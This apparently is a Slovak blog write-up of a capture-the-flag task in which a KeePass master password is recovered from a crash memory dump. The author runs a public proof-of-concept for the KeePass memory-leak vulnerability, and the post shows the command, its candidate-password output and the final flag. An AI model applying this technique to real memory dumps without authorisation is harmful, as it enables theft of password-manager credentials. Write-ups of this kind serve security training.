Kapitán si dal priveľa námorného pressa a dostal sa tak dočasne mimo službu. Prvý dôstojník je síce vo velení, ale nepozná kapitánove heslo pre lodné systémy. Dobrá správa je, že kapitán používa manažér hesiel a dôstojník našiel kapitánov pamäťový dump po páde systému.
Po stiahnutí a rozbalení vyše 1GB veľkého súboru (a súboru manažéra hesiel captain.kdbx) bolo jasné, že ide o Keepass. Keepass má nedávno zverejnenú (v 2.54 opravenú) zraniteľnosť, ktorá umožňuje vytiahnuť väčšinu písmen z master password (hlavné heslo do keepass súboru) z pamäte, kde sú časti s bodkami a jedným písmenom, ako sa heslo postupne zadáva do políčka ručne po písmene.
Skúsil som python verziu z tejto adresy na githube. Heslo, ktoré dopátral pod linuxom za cca 5min je (doplniť "p"):
$ python3 poc.py -d crashdump.dmp
2023-10-21 23:14:15,589 [.] [main] Opened crashdump.dmp
Possible password: ●)ssword4mypreciousship
Possible password: ●assword4mypreciousship
Possible password: ●:ssword4mypreciousship
Possible password: ●|ssword4mypreciousship
Possible password: ●Wssword4mypreciousship
Possible password: ●5ssword4mypreciousship
Possible password: ●rssword4mypreciousship
Položka main flag system obsahuje vlajku ako heslo: FLAG{pyeB-941A-bhGx-g3RI}
Žiadne komentáre:
Zverejnenie komentára